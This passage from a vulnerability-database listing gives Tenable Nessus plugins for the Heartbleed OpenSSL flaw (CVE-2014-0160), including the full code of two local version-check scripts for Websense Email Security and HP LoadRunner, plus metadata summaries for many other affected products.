      # http://www.websense.com/support/article/kbarticle/Hotfix-OpenSSL-for-Websense-Email-Security-7-3-with-HF-6-and-later
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?35854217");
      script_set_attribute(attribute:"see_also", value:"http://www.heartbleed.com");
      script_set_attribute(attribute:"see_also", value:"https://eprint.iacr.org/2014/140");
      script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/vulnerabilities.html#2014-0160");
      script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/secadv/20140407.txt");
      script_set_attribute(attribute:"solution", value:
    "Refer to the vendor advisory and apply the necessary patch.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-0160");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"in_the_news", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2014/02/24");
      script_set_attribute(attribute:"patch_publication_date", value:"2014/04/09");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/04/29");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:websense:websense_email_security");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("websense_email_security_installed.nasl");
      script_require_keys("SMB/Websense Email Security/Path");
      script_require_ports(139, 445);
    
      exit(0);
    }
    
    include("audit.inc");
    include("smb_func.inc");
    include("smb_hotfixes.inc");
    include("smb_hotfixes_fcheck.inc");
    include("smb_reg_query.inc");
    include("misc_func.inc");
    
    function get_file_list(dir, pattern, max_depth)
    {
      local_var retx, file_list, dir_list, r_file_list, r_dir;
      if(max_depth < 0)
        return NULL;
    
      retx = FindFirstFile(pattern:dir + "\*");
      file_list = make_list();
      dir_list = make_list();
    
      while(!isnull(retx[1]))
      {
        if(retx[2] & FILE_ATTRIBUTE_DIRECTORY && retx[1] != '.' && retx[1] != '..')
          dir_list = make_list(dir_list, retx[1]);
        else
        {
          if(retx[1] =~ pattern)
            file_list = make_list(file_list, dir + "\" + retx[1]);
        }
        retx = FindNextFile(handle:retx);
      }
    
      foreach r_dir (dir_list)
      {
        r_file_list = get_file_list(dir:dir + "\" + r_dir, pattern: pattern, max_depth: max_depth - 1);
        if(r_file_list != NULL)
          file_list = make_list(file_list, r_file_list);
      }
    
      return file_list;
    }
    
    path = get_kb_item_or_exit('SMB/Websense Email Security/Path');
    version = get_kb_item_or_exit('SMB/Websense Email Security/Version');
    
    # Per vendor :
    # Any build number greater than 7.3.1181 is vuln
    # No need to check earlier versions for the DLL
    if (ver_compare(ver:version, fix:"7.3.1181", strict:FALSE) < 0)
      audit(AUDIT_INST_PATH_NOT_VULN, 'Websense Email Security', version, path);
    
    name    =  kb_smb_name();
    port    =  kb_smb_transport();
    login   =  kb_smb_login();
    pass    =  kb_smb_password();
    domain  =  kb_smb_domain();
    
    registry_init();
    
    share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
    rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);
    if (rc != 1)
    {
      NetUseDel();
      audit(AUDIT_SHARE_FAIL, share);
    }
    
    # Find OpenSSL DLLs under main install path
    search_dir = ereg_replace(pattern:'[A-Za-z]:(.*)', replace:'\\1', string:path);
    dlls = get_file_list(dir:search_dir, pattern:"^(libeay32|ssleay32)\.dll$", max_depth:3);
    info = "";
    foreach dll (dlls)
    {
      temp_path = (share - '$')+ ":" + dll;
      dll_ver = hotfix_get_pversion(path:temp_path);
      err_res = hotfix_handle_error(
        error_code   : dll_ver['error'],
        file         : temp_path,
        appname      : 'Websense Email Security',
        exit_on_fail : FALSE
      );
      if (err_res) continue;
    
      dll_version = join(dll_ver['value'], sep:".");
    
      if (dll_version =~ "^1\.0\.1[a-f]$")
        info +=
          '\n  Path              : ' + temp_path +
          '\n  Installed version : ' + dll_version +
          '\n  Fixed version     : 1.0.1g\n';
    }
    hotfix_check_fversion_end();
    
    if (info)
    {
      if (report_verbosity > 0) security_warning(port:port, extra:info);
      else security_warning(port);
    }
    else audit(AUDIT_INST_PATH_NOT_VULN, 'Websense Email Security', version, path);
    
  • NASL family: Windows
    NASL id: HP_LOADRUNNER_12_00_1.NASL
    description: The version of HP LoadRunner installed on the remote host is 11.52.x prior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. It is, therefore, affected by an out-of-bounds read error, known as the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 77054
    published: 2014-08-07
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/77054
    title: HP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed)
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(77054);
      script_version("1.14");
      script_cvs_date("Date: 2019/11/25");
    
      script_cve_id("CVE-2014-0160");
      script_bugtraq_id(66690);
      script_xref(name:"CERT", value:"720951");
      script_xref(name:"EDB-ID", value:"32745");
      script_xref(name:"EDB-ID", value:"32764");
      script_xref(name:"EDB-ID", value:"32791");
      script_xref(name:"EDB-ID", value:"32998");
      script_xref(name:"HP", value:"HPSBMU03040");
      script_xref(name:"HP", value:"SSRT101565");
    
      script_name(english:"HP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed)");
      script_summary(english:"Checks the version of HP LoadRunner.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote Windows host has an application that is affected by an
    information disclosure vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The version of HP LoadRunner installed on the remote host is 11.52.x
    prior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. It is,
    therefore, affected by an out-of-bounds read error, known as the
    'Heartbleed Bug' in the included OpenSSL version.
    
    This error is related to handling TLS heartbeat extensions that could
    allow an attacker to obtain sensitive information such as primary key
    material, secondary key material, and other protected content.");
      # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04286049
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c3b43466");
      script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/532104/30/0/threaded");
      script_set_attribute(attribute:"see_also", value:"http://www.heartbleed.com");
      script_set_attribute(attribute:"see_also", value:"https://eprint.iacr.org/2014/140");
      script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/vulnerabilities.html#2014-0160");
      script_set_attribute(attribute:"see_also", value:"https://www.openssl.org/news/secadv/20140407.txt");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to HP LoadRunner 11.52 Patch 2 / 12.00 Patch 1 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-0160");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"in_the_news", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2014/02/24");
      script_set_attribute(attribute:"patch_publication_date", value:"2014/05/14");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/08/07");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:loadrunner");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("hp_loadrunner_installed.nasl");
      script_require_keys("SMB/Registry/Enumerated", "installed_sw/HP LoadRunner");
      script_require_ports(139, 445);
    
      exit(0);
    }
    
    include('audit.inc');
    include('smb_func.inc');
    include('smb_hotfixes.inc');
    include('smb_hotfixes_fcheck.inc');
    include('smb_reg_query.inc');
    include('misc_func.inc');
    include("install_func.inc");
    
    app_name = "HP LoadRunner";
    cutoff  = NULL;
    cutoff2 = NULL;
    fixed   = NULL;
    report  = NULL;
    
    # Only 1 install of the server is possible.
    install = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);
    
    version = install['version'];
    path = install['path'];
    verui = install['display_version'];
    
    # Determine cutoff if affected branch.
    # 11.52.0 is 11.52.1323.0 or 11.52.1517.0
    # 12.00.0 is 12.00.661.0
    if (version =~ "^11\.52($|[^0-9])")
    {
      cutoff  = "11.52.1323.0";
      cutoff2 = "11.52.1517.0";
    }
    if (version =~ "^12\.00?($|[^0-9])")
    {
      cutoff = "12.0.661.0";
      cutoff2 = "12.0.661.0";
    }
    
    if (isnull(cutoff)) audit(AUDIT_NOT_INST, app_name + " 11.52.x / 12.0.x");
    
    if (version >= cutoff && version <= cutoff2)
    {
      foreach file (make_list("ssleay32_101_x32.dll", "ssleay32_101_x64.dll"))
      {
        dll_path = path + "bin\" + file;
        res = hotfix_get_fversion(path:dll_path);
        err_res = hotfix_handle_error(
          error_code   : res['error'],
          file         : dll_path,
          appname      : app_name,
          exit_on_fail : FALSE
        );
        if (err_res) continue;
    
        dll_ver = join(sep:'.', res['value']);
        break;
      }
      hotfix_check_fversion_end();
    
      if (empty_or_null(dll_ver))
        audit(
          AUDIT_VER_FAIL,
          "ssleay32_101_x32.dll and ssleay32_101_x64.dll under " + path + "bin\"
        );
    
      fixed_dll_ver = '1.0.1.4';
      if (ver_compare(ver:dll_ver, fix:fixed_dll_ver, strict:FALSE) == -1)
        report =
          '\n  Path                  : ' + dll_path +
          '\n  Installed DLL version : ' + dll_ver  +
          '\n  Fixed DLL version     : ' + fixed_dll_ver +
          '\n';
    }
    # If not at a patchable version, use ver_compare() and suggest
    # upgrade if needed; do not use cutoff2 - this will lead to
    # false positives.
    else if (
      (
        cutoff =~ "^11\." &&
        ver_compare(ver:"11.52", fix:version, strict:FALSE) >= 0 &&
        ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1
      )
      ||
      (
        cutoff =~ "^12\." &&
        ver_compare(ver:"12.00", fix:version, strict:FALSE) >= 0 &&
        ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1
      )
    )
    {
      report =
        '\n  Path              : ' + path +
        '\n  Installed version : ' + version +
        '\n  Fixed version     : 11.52.1323.0 (11.52 Patch 2) / 12.0.661.0 (12.00 Patch 1)' +
        '\n';
    }
    
    if (isnull(report)) audit(AUDIT_INST_PATH_NOT_VULN, app_name, verui, path);
    
    port = kb_smb_transport();
    
    if (report_verbosity > 0) security_warning(extra:report, port:port);
    else security_warning(port);
    
  • NASL family: Misc.
    NASL id: VMWARE_VMSA-2014-0004_REMOTE.NASL
    description: The remote VMware ESXi host is affected by multiple vulnerabilities in the OpenSSL third-party library : - A flaw exists in the Elliptic Curve Digital Signature Algorithm (ECDSA) implementation due to a failure to ensure that certain swap operations have a constant-time behavior. An attacker can exploit this to obtain the ECDSA nonces by using a FLUSH+RELOAD cache side-channel attack. (CVE-2014-0076) - An out-of-bounds read error, known as Heartbleed, exists in the TLS/DTLS implementation due to improper handling of TLS heartbeat extension packets. A remote attacker, using crafted packets, can trigger a buffer over-read, resulting in the disclosure of up to 64KB of process memory, which contains sensitive information such as primary key material, secondary key material, and other protected content. (CVE-2014-0160)
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 87676
    published: 2015-12-30
    reporter: This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/87676
    title: VMware ESXi Multiple OpenSSL Vulnerabilities (VMSA-2014-0004) (Heartbleed)
  • NASL family: Scientific Linux Local Security Checks
    NASL id: SL_20140408_OPENSSL_ON_SL6_X.NASL
    description: An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73408
    published: 2014-04-08
    reporter: This script is Copyright (C) 2014 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/73408
    title: Scientific Linux Security Update : openssl on SL6.x i386/x86_64
  • NASL family: Windows
    NASL id: SMB_KB2962393.NASL
    description: The remote host is missing KB2962393, which resolves an OpenSSL information disclosure vulnerability (Heartbleed) in the Juniper VPN client software shipped with Windows 8.1.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73865
    published: 2014-05-05
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/73865
    title: MS KB2962393: Update for Vulnerability in Juniper Networks Windows In-Box Junos Pulse Client (Heartbleed)
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2014-4910.NASL
    description: pull in upstream patch for CVE-2014-0160
    last seen: 2020-03-17
    modified: 2014-04-09
    plugin id: 73430
    published: 2014-04-09
    reporter: This script is Copyright (C) 2014-2020 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/73430
    title: Fedora 19 : openssl-1.0.1e-37.fc19.1 (2014-4910)
  • NASL family: Windows
    NASL id: HP_INSIGHT_CONTROL_SERVER_MIGRATION_7_3_2.NASL
    description: According to its version, the HP Insight Control Server Migration install on the remote Windows host includes a bundled copy of OpenSSL that is affected by an information disclosure vulnerability. A remote attacker could read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 76463
    published: 2014-07-10
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/76463
    title: HP Insight Control Server Migration 7.3.0 and 7.3.1 OpenSSL Heartbeat Information Disclosure (Heartbleed)
  • NASL family: Windows
    NASL id: VMWARE_WORKSTATION_MULTIPLE_VMSA_2014_0004.NASL
    description: The version of VMware Workstation installed on the remote host is version 10.x prior to 10.0.2. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73674
    published: 2014-04-21
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/73674
    title: VMware Workstation 10.x < 10.0.2 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Heartbleed)
  • NASL family: MacOS X Local Security Checks
    NASL id: MACOSX_LIBREOFFICE_423.NASL
    description: A version of LibreOffice 4.2.x prior to 4.2.3 is installed on the remote Mac OS X host. This version of LibreOffice is bundled with a version of OpenSSL affected by multiple vulnerabilities : - An error exists in the function
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 76511
    published: 2014-07-15
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/76511
    title: LibreOffice 4.2.x < 4.2.3 OpenSSL Multiple Vulnerabilities (Mac OS X) (Heartbleed)
  • NASL family: Misc.
    NASL id: FORTINET_FG-IR-14-011.NASL
    description: The firmware of the remote Fortinet host is running a version of OpenSSL that is affected by a remote information disclosure, commonly known as the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73669
    published: 2014-04-11
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/73669
    title: Fortinet OpenSSL Information Disclosure (Heartbleed)
  • NASL family: Windows
    NASL id: STUNNEL_5_01.NASL
    description: The version of stunnel installed on the remote host is prior to version 5.01. It is, therefore, affected by an information disclosure vulnerability in the bundled OpenSSL DLLs. A remote attacker can read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data. Note that Nessus has not tested for this issue but has instead relied only on the application
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73500
    published: 2014-04-14
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/73500
    title: stunnel < 5.01 OpenSSL Heartbeat Information Disclosure (Heartbleed)
  • NASL family: Red Hat Local Security Checks
    NASL id: REDHAT-RHSA-2014-0376.NASL
    description: Updated openssl packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. All OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73396
    published: 2014-04-08
    reporter: This script is Copyright (C) 2014-2019 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/73396
    title: RHEL 6 : openssl (RHSA-2014:0376)
  • NASL family: Windows
    NASL id: ATTACHMATE_REFLECTION_HEARTBLEED.NASL
    description: The Attachmate Reflection install on the remote host is affected by an out-of-bounds read error known as the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 76309
    published: 2014-06-30
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/76309
    title: Attachmate Reflection Heartbeat Information Disclosure (Heartbleed)
  • NASL family: Firewalls
    NASL id: MCAFEE_FIREWALL_ENTERPRISE_SB10071.NASL
    description: The remote host has a version of McAfee Firewall Enterprise installed that is affected by an out-of-bounds read error, known as Heartbleed, in the TLS/DTLS implementation due to improper handling of TLS heartbeat extension packets. A remote attacker, using crafted packets, can trigger a buffer over-read, resulting in the disclosure of up to 64KB of process memory, which contains sensitive information such as primary key material, secondary key material, and other protected content.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73834
    published: 2014-05-02
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/73834
    title: McAfee Firewall Enterprise OpenSSL Information Disclosure (SB10071) (Heartbleed)
  • NASL family: SuSE Local Security Checks
    NASL id: OPENSUSE-2014-277.NASL
    description: This openssl update fixes one security issue : - bnc#872299: Fixed missing bounds checks for heartbeat messages (CVE-2014-0160).
    last seen: 2020-06-05
    modified: 2014-06-13
    plugin id: 75314
    published: 2014-06-13
    reporter: This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/75314
    title: openSUSE Security Update : openssl (openSUSE-SU-2014:0492-1) (Heartbleed)
  • NASL family: Windows
    NASL id: FILEZILLA_SERVER_0944.NASL
    description: According to its banner, the version of FileZilla Server running on the remote host is prior to 0.9.44. It is, therefore, affected by an information disclosure vulnerability. An information disclosure flaw exists with the OpenSSL included with FileZilla Server. A remote attacker could read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data. Note that Nessus has not tested for this issue but has instead relied only on the application
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73640
    published: 2014-04-21
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/73640
    title: FileZilla Server < 0.9.44 OpenSSL Heartbeat Information Disclosure (Heartbleed)
  • NASL family: MacOS X Local Security Checks
    NASL id: MACOSX_FUSION_6_0_3.NASL
    description: The version of VMware Fusion 6.x installed on the remote Mac OS X host is prior to 6.0.3. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73670
    published: 2014-04-21
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/73670
    title: VMware Fusion 6.x < 6.0.3 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Heartbleed)
  • NASL family: Windows
    NASL id: SYMANTEC_ENDPOINT_PROT_MGR_12_1_RU4_MP1A.NASL
    description: According to its self-reported version number, the version of Symantec Endpoint Protection Manager (SEPM) installed on the remote host is affected by an out-of-bounds read error, known as the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73964
    published: 2014-05-12
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/73964
    title: Symantec Endpoint Protection Manager < 12.1 RU4 MP1a OpenSSL Heartbeat Information Disclosure (Heartbleed)
  • NASL family: Web Servers
    NASL id: HP_OFFICEJET_PRO_HEARTBLEED.NASL
    description: According to its self-reported build information, the firmware running on the remote HP OfficeJet printer is affected by an out-of-bounds read error, known as the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 74270
    published: 2014-06-02
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/74270
    title: HP OfficeJet Printer Heartbeat Information Disclosure (Heartbleed)
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2014-9308.NASL
    description: Multiple moderate issues fixed. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-03-17
    modified: 2014-08-10
    plugin id: 77108
    published: 2014-08-10
    reporter: This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/77108
    title: Fedora 20 : openssl-1.0.1e-39.fc20 (2014-9308) (Heartbleed)
  • NASL family: VMware ESX Local Security Checks
    NASL id: VMWARE_VMSA-2014-0004.NASL
    description: a. Information Disclosure vulnerability in OpenSSL third-party library The OpenSSL library is updated to version openssl-1.0.1g to resolve multiple security issues. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2014-0076 and CVE-2014-0160 to these issues. CVE-2014-0160 is known as the Heartbleed issue. More information on this issue may be found in the reference section. To remediate the issue for products that have updated versions or patches available, perform these steps: * Deploy the VMware product update or product patches * Replace certificates per the product-specific documentation * Reset passwords per the product-specific documentation Section 4 lists product-specific references to installation instructions and certificate management documentation.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73851
    published: 2014-05-03
    reporter: This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/73851
    title: VMSA-2014-0004 : VMware product updates address OpenSSL security vulnerabilities
  • NASL family: Web Servers
    NASL id: HPSMH_7_3_2.NASL
    description: According to the web server
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73639
    published: 2014-04-18
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/73639
    title: HP System Management Homepage OpenSSL Multiple Vulnerabilities (Heartbleed)
  • NASL family: Slackware Local Security Checks
    NASL id: SLACKWARE_SSA_2014-098-01.NASL
    description: New openssl packages are available for Slackware 14.0, 14.1, and -current to fix security issues.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73409
    published: 2014-04-08
    reporter: This script is Copyright (C) 2014 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/73409
    title: Slackware 14.0 / 14.1 / current : openssl (SSA:2014-098-01)
  • NASL family: F5 Networks Local Security Checks
    NASL id: F5_BIGIP_SOL15159.NASL
    description: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug. (CVE-2014-0160) Impact A malicious user can exploit vulnerable systems and retrieve information from memory. This information may potentially include user credentials or the private keys used for Transport Layer Security (TLS) or Datagram Transport Layer Security (DTLS). For information about vulnerable components or features, refer to the following list : Virtual servers using a Secure Sockets Layer (SSL) profile configured with the default Native SSL ciphers are not vulnerable. Only virtual servers using an SSL profile configured to use ciphers from the COMPAT SSL stack are vulnerable in BIG-IP 11.5.0 and 11.5.1. Additionally, virtual servers that do not use SSL profiles and pass SSL traffic to the back-end web servers will not protect the back-end resource servers. The Configuration utility and other services, such as iControl, are vulnerable. The big3d process included with BIG-IP GTM 11.5.0 and 11.5.1 is vulnerable. Additionally, monitored BIG-IP systems whose big3d process was updated by an affected BIG-IP GTM system are also vulnerable. The big3d process included with Enterprise Manager 3.1.1 HF1 and HF2 is vulnerable. Additionally, monitored BIG-IP systems whose big3d process was updated by an affected Enterprise Manager system are also vulnerable. The BIG-IP Edge Client for Android is not vulnerable. However, the BIG-IP Edge Client for Windows, Mac OS, and Linux is vulnerable. An attacker can retrieve sensitive information by using the stated vulnerability in the following scenarios: User is tricked into connecting to any malicious SSL server. User connects to a compromised FirePass or BIG-IP APM system.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 78164
    published: 2014-10-10
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/78164
    title: F5 Networks BIG-IP : OpenSSL vulnerability (K15159) (Heartbleed)
  • NASL familyAIX Local Security Checks
    NASL idAIX_OPENSSL_ADVISORY7.NASL
    descriptionThe version of OpenSSL running on the remote host is affected by an information disclosure vulnerability. OpenSSL incorrectly handles memory in the TLS heartbeat extension, potentially allowing a remote attacker to read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data.
    last seen2020-06-01
    modified2020-06-02
    plugin id73472
    published2014-04-11
    reporterThis script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73472
    titleAIX OpenSSL Advisory : openssl_advisory7.doc (Heartbleed)
  • NASL familyMisc.
    NASL idMCAFEE_EMAIL_GATEWAY_SB10071.NASL
    descriptionThe remote host is running a version of McAfee Email Gateway (MEG) that is affected by an information disclosure due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device.
    last seen2020-06-01
    modified2020-06-02
    plugin id73832
    published2014-05-02
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73832
    titleMcAfee Email Gateway OpenSSL Information Disclosure (SB10071) (Heartbleed)
  • NASL familyWeb Servers
    NASL idSPLUNK_603.NASL
    descriptionAccording to its version number, the Splunk Web hosted on the remote web server is 6.x prior to 6.0.3. It is, therefore, affected by multiple OpenSSL-related vulnerabilities : - A flaw exists with the OpenSSL version being used by Splunk with the
    last seen2020-06-01
    modified2020-06-02
    plugin id73575
    published2014-04-16
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73575
    titleSplunk 6.x < 6.0.3 Multiple OpenSSL Vulnerabilities (Heartbleed)
  • NASL familyWindows
    NASL idWINSCP_5_5_3.NASL
    descriptionThe WinSCP program installed on the remote host is version 4.x later than 4.3.7, 5.x later than 5.0.6 and prior to 5.5.3. It is, therefore, affected by the following vulnerabilities : - An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73613
    published2014-04-18
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73613
    titleWinSCP Heartbeat Information Disclosure (Heartbleed)
  • NASL familyGeneral
    NASL idVMWARE_WORKSTATION_LINUX_10_0_2.NASL
    descriptionThe installed version of VMware Workstation 10.x is prior to 10.0.2. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73673
    published2014-04-21
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73673
    titleVMware Workstation 10.x < 10.0.2 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Linux) (Heartbleed)
  • NASL familyWindows
